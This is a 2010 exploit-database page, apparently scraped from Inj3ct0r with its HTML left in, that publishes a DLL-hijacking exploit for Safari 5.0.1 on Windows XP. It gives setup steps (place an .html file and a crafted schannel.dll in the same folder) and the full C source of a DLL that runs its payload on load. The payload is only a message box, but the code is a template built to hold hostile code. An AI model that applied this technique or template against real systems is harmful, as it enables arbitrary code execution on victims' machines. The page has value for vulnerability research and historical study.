Home / os / win7

[local exploits] - Safari v5.0.1 DLL Hijacking (schannel.dll

Posted on 08 September 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Safari v5.0.1 DLL Hijacking (schannel.dll) Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Exploit category: local exploits | Exploit author: Adrabi Abderrahim' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>================================================== Safari v5.0.1 DLL Hijacking (schannel.dll) Exploit ================================================== Version: Safari 5.0.1 Tested on: Windows XP SP2 Author : Adrabi Abderrahim (Just Another Ghost In The Shell) Note : This file has been generated by Hij4c0r Project more info visite http://launchpad.net/hij4c0r. Place a .html and schannel.dll in same folder and run file in safari. Code for schannel.dll (original generated source file): /** * Author: &lt;Your Name/Nick&gt; * E-Maill: &lt;Your Mail&gt; * Description: &lt;Your Description&gt; * Note : This file has been generated by Hij4c0r Project (remove this note is you want ^_^). */ #include &lt;windows.h&gt; #define DLLIMPORT __declspec(dllexport) void hij4c0r() { //DON&#039;T CHANGE THIS LINE MessageBox(NULL, &quot;schannel.dll&quot; , &quot;DLL&quot; , MB_ICONINFORMATION); } DLLIMPORT void hook_startup() { hij4c0r(); } BOOL APIENTRY DllMain(HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { switch (fdwReason) { case DLL_PROCESS_ATTACH: hij4c0r(); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-08]</pre></body></html>

 

TOP